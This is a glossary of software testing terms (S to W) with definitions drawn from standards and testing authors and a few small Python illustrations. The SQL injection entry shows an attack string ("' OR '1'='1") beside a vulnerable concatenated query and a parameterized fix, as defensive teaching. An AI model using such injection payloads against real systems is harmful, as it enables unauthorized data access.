Smoke Test
A subset of all defined/planned test cases that cover the main functionality of a component or system, to ascertain that the most crucial functions of a program work, but not bothering with finer details. A daily build and smoke test is among industry best practices. [ISTQB]
Soak Testing
Testing a system with a significant load extended over a significant period of time, to discover how the system behaves under sustained use. [wikipedia]
Software Audit
An independent review for the purpose of assessing compliance with requirements, specifications, standards, procedures, codes, contractual and licensing requirements, and so forth.
Software Error
Human action that results in software that contains a fault that, if encountered, may cause a failure. [B. Hetzel]
Software Failure
A departure of system operation from specified requirements due to a software error. [B. Hetzel]
Software Quality
The totality of features and characteristics of a software product that bears on its ability to satisfy given needs. [B. Hetzel]
Software Quality Assurance
The function of software quality that assures that the standards, processes, and procedures are appropriate for the project and are correctly implemented. [NASA.gov]
Software Reliability
Probability that software will not cause the failure of a system for a specified time under specified conditions. [B. Hetzel]
Specification
A tangible, usually partial expression of requirements. Examples: document, list of features, prototype, test suite. Specifications are usually incomplete because many requirements are understood. For example, "the software will not crash or corrupt data." The biggest mistake a tester can make is to assume that all requirements are expressed by the specification. [B. Beizer]
A statement of a set of requirements to be satisfied by a product. [B. Hetzel]
SQL Injection
SQL injection is a hacking technique which attempts to pass SQL commands through a web application's user interface for execution by the backend database.
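A small illustration using Python's built-in sqlite3 module (standing in for whatever backend database the application really uses); the table and the attack string are invented:

# Illustration: string concatenation versus a parameterized query.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "alice' OR '1'='1"          # attacker-controlled string

# Vulnerable: user input is pasted directly into the SQL text.
rows = conn.execute(
    "SELECT secret FROM users WHERE name = '" + user_input + "'").fetchall()
print("vulnerable query returned:", rows)      # returns every row

# Safer: a parameterized query treats the input as data, not SQL.
rows = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (user_input,)).fetchall()
print("parameterized query returned:", rows)   # returns nothing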
Standard
Mandatory requirements employed and enforced to prescribe a disciplined uniform approach to software development. [SEI]
Statement Coverage
The percentage of executable statements that have been exercised by a test suite. [ISTQB]
Statement Of Work
A description of all the work required to complete a project, which is provided by the customer. [SEI]
Static Analysis
Analysis of software artifacts, e.g. requirements or code, carried out without execution of these software artifacts. [ISTQB]
Stress Testing
Stress testing involves subjecting the program to heavy loads or stresses. This should not be confused with volume testing; a heavy stress is a peak volume of data encountered over a short span of time. [G. Myers]
String Testing
A software development test phase that finds bugs in typical usage scripts and operational or control-flow "strings". This test phase is fairly unusual. [R. Black]
Structural Testing
Structural testing is sometimes confused with glass box testing. I don't think you can do black box structural testing, but I think the focus of structural testing is on the flow of control of the program, testing of different execution paths through the program. I think that there are glass box techniques that focus on data relationships, interaction with devices, interpretation of messages, and other considerations that are not primarily structural. [C. Kaner]
Testing which requires that inputs be drawn based solely on the structure of the source code or its data structures. Structural testing is also called code-based testing and white-box testing. [J. Whittaker]
Stub
A skeletal or special-purpose implementation of a software component, used to develop or test a component that calls or is otherwise dependent on it. It replaces a called component. [IEEE]
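For example (all names invented), an order-handling component that normally calls a payment gateway can be tested in isolation by handing it a stub with a canned response:

# Sketch: a stub replaces the real payment gateway the component depends on.
class PaymentGatewayStub:
    def charge(self, amount):
        return "approved"          # canned answer instead of a real network call

def place_order(amount, gateway):
    if gateway.charge(amount) == "approved":
        return "order placed"
    return "order rejected"

assert place_order(25.00, PaymentGatewayStub()) == "order placed"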
Sunny-Day Testing
Positive tests. Tests used to demonstrate the system's correct working.
SWAG
Acronym for Scientific Wild-Ass Guess; an educated guess or estimate. SWAGs abound in test scheduling activities early in the development process. [R. Black]
System Reliability
Probability that a system will perform a required task or mission for a specified time in a specified environment. [B. Hetzel]
System Testing
System Testing is done to explore system behaviors that can't be explored by unit, component, or integration testing. For example, testing performance, installation, data integrity, storage management, security, and reliability. Ideal system testing presumes that all components have been previously, successfully, integrated. System testing is often done by independent testers. [B. Beizer]
Testing of groups of programs.
Process of testing an integrated system to verify that it meets specified criteria. [B. Hetzel]
The testing of a collection of components that constitutes a deliverable product. [J. Whittaker]
System Under Test
(SUT) The system which is the target of the testing process.
Test
The word test is derived from the Latin word for an earthen pot or vessel (testum). Such a pot was used for assaying materials to determine the presence or measure the weight of various elements, thus the expression "to put to the test." [B. Hetzel]
An activity in which a system or component is executed under specified conditions, the results are observed or recorded, and an evaluation is made of some aspect of the system or component. [IEEE]
Test and Evaluation
As employed in the DOD, T & E is the overall activity of independent evaluation "conducted throughout the system acquisition process to assess and reduce acquisition risks and to estimate the operational effectiveness and suitability of the system being developed." [B. Hetzel]
Test Bed
An execution environment configured for testing. May consist of specific hardware, OS, network topology, configuration of the product under test, other application or system software, etc. The Test Plan for a project should enumerate the test bed(s) to be used.
Test Case
A set of test inputs, execution conditions, and expected results developed for a particular objective, such as to exercise a particular program path or to verify compliance with a specific requirement.
A specific set of test data along with expected results for a particular test objective, such as to exercise a program feature or to verify compliance with a specific requirement. [B. Hetzel]
Test Case Specification
A document specifying the test data for use in running the test conditions identified in the Test Design Specification. [IEEE]
Test Condition
A test condition is a particular behavior that you need to verify of the system under test.
Test Data
Data that is run through a computer program to test the software.
Input data and file conditions associated with a particular test case. [B. Hetzel]
Test Design
A selection and specification of a set of test cases to meet the test objectives or coverage criteria. [B. Hetzel]
Test Design Specification
A document detailing test conditions and the expected results as well as test pass criteria. [IEEE]
Test-Driven Development
Test-driven development (TDD) is a programming technique heavily emphasized in Extreme Programming. Essentially the technique involves writing your tests first, then implementing the code to make them pass. The goal of TDD is to achieve rapid feedback, and it implements the "illustrate the main line" approach to constructing a program. [wikipedia]
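One cycle of the technique, sketched in Python (the slugify example is invented): write the failing test first, then just enough code to make it pass, then refactor as needed.

# Sketch of one TDD cycle.
# Step 1 -- the test exists before the implementation (and fails at first):
def test_slugify_replaces_spaces():
    assert slugify("Hello World") == "hello-world"

# Step 2 -- the simplest implementation that makes the test pass:
def slugify(text):
    return text.lower().replace(" ", "-")

test_slugify_replaces_spaces()     # with a runner such as pytest this step is automatic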
Test Environment
The hardware and software environment in which tests will be run, and any other software with which the software under test interacts when under test including stubs and test drivers.
Test Harness
A test environment comprised of stubs and drivers needed to execute a test. [ISTQB]
Test Incident Report
A document detailing, for any test that failed, the actual versus expected result, and other information intended to throw light on why a test has failed. [IEEE]
Test Item Transmittal Report
A document reporting on when tested software components have progressed from one stage of testing to the next. [IEEE]
Test Log
A chronological record of all relevant details of a testing activity. [B. Hetzel]
A document recording which test cases were run, who ran them, in what order, and whether each test passed or failed. [IEEE]
Test Plan
A document describing the scope, approach, resources, and schedule of intended testing activities. It identifies test items, the features to be tested, the testing tasks, who will do each task, and any risks requiring contingency planning. [IEEE]
A detail of how the test will proceed, who will do the testing, what will be tested, in how much time the test will take place, and to what quality level the test will be performed. [IEEE]
A document prescribing the approach to be taken for intended testing activities. [B. Hetzel]
Test Procedure
A document defining the steps required to carry out part of a test plan or execute a set of test cases. [B. Hetzel]
Test Procedure Specification
A document detailing how to run each test, including any set-up preconditions and the steps that need to be followed. [IEEE]
Test Script
A document, program, or object that specifies for every test and subtest in a test suite: object to be tested, requirement (usually a case), initial state, inputs, expected outcome, and validation criteria.
Test Suite
A set of one or more tests, usually aimed at a single object, with a common purpose and data base, usually run as a set. [B. Beizer]
Test Summary Report
A management report providing any important information uncovered by the tests accomplished, and including assessments of the quality of the testing effort, the quality of the software system under test, and statistics derived from the Incident Reports. [IEEE]
Test Tool
A software product that supports one or more test activities, such as planning and control, specification, building initial files and data, test execution and test analysis. [ISTQB]
Test Validity
The degree to which a test accomplishes its specified goal
Testability
Normally the term "testability" refers to the ease or cost of testing, or the ease of testing with the tools and processes currently in use. So, a feature might be more testable if you have all the right systems in place, and lots of time. Or it might not be very testable, because you have reached a deadline, and have run out of time and/or money. Sometimes, the term "testability" refers to requirements. There, it's used as a measure of clarity, so that you can know if the test of a requirement passes or fails. So, "the UI must be intuitive and fast" may not be very "testable", without knowing what is meant by "intuitive" and how you would measure "fast enough".

Testing
Testing is the process of executing a program with the intent of finding errors. [G. Myers]
The act of designing, debugging and executing tests. [B. Beizer]
Testing is any activity aimed at evaluating an attribute or capability of a program or system and determining that it meets its required results. [B. Hetzel]
The process of executing a software system to determine whether it matches its specification and executes in its intended environment. [J. Whittaker]
The process of operating a system or component under specified conditions, observing or recording the results, and making an evaluation of some aspect of the system or component. [IEEE]
Testware
Software, and sometimes data, used for testing.
Thread Testing
Testing which demonstrates key functional capabilities by testing a string of units that accomplish a specific function in the application.
Unit
The smallest thing that can be tested. It (usually) begins as the work of one programmer and corresponds to the smallest compilable program segment, such as a subroutine. A unit, as a tested object, does not usually include the subroutines or functions that it calls, fixed tables, and so on. [B. Beizer]
Unit Testing
Testing of units. In unit testing, called subroutine and function calls are treated as if they are language parts (e.g. keywords). Called and calling components are either assumed to work correctly or are replaced by simulators. Unit testing usually is done by the unit's originator. [B. Beizer]
Testing of individual programs as they are written. [B. Hetzel]
The testing of individual software components or a collection of components. [J. Whittaker]
Usability Testing
Testing to determine the extent to which the software product is understood, easy to learn, easy to operate, and attractive to the users under specified conditions. [ISTQB]
Use Case
In software engineering, a use case is a technique for capturing the potential requirements of a new system or software change. Each use case provides one or more scenarios that convey how the system should interact with the end user or another system to achieve a specific business goal. Use cases typically avoid technical jargon, preferring instead the language of the end user or domain expert. Use cases are often co-authored by software developers and end users. [wikipedia]
User Acceptance Testing
A formal product evaluation performed by a customer as a condition of purchase. Formal testing of a new computer system by prospective users. This is carried out to determine whether the software satisfies its acceptance criteria and should be accepted by the customer. User acceptance testing (UAT) is one of the final stages of a software project and will often be performed before a new system is accepted by the customer. [wikipedia]
User Interface
The user interface (also known as Human Computer Interface or Man-Machine Interface (MMI)) is the aggregate of means by which people interact with the system. The user interface provides means of input and output. [wikipedia]
User Interface Freeze
The point in time in the development process in which no changes whatsoever are permitted to the user interface. Stability of the UI is often necessary for creating Help documents, screenshots, marketing materials, etc.
Validation Testing
The process of evaluating software at the end of the development process to ensure compliance with requirements. [B. Hetzel]
The process of evaluating an object to demonstrate that it meets requirements. [D. Wallace]
Verification
The process of evaluating a system or component to determine whether the products of the given development phase satisfy the conditions imposed at the start of that phase. [IEEE]
Evaluation performed at the end of a phase with the objective of ensuring that the requirements established during the previous phases have been met. (More generally, verification refers to the overall software evaluation activity, including reviewing, inspecting, testing, checking, and auditing). [B. Hetzel]
Volume Testing
Subjecting the program to heavy volumes of data. [G. Myers]
Walkthrough
A review process in which the designer leads one or more others through a segment of design or code he or she has written. [B. Hetzel]
White Box Testing
Testing done under structural testing strategy. (also called Glass Box Testing) [B. Beizer]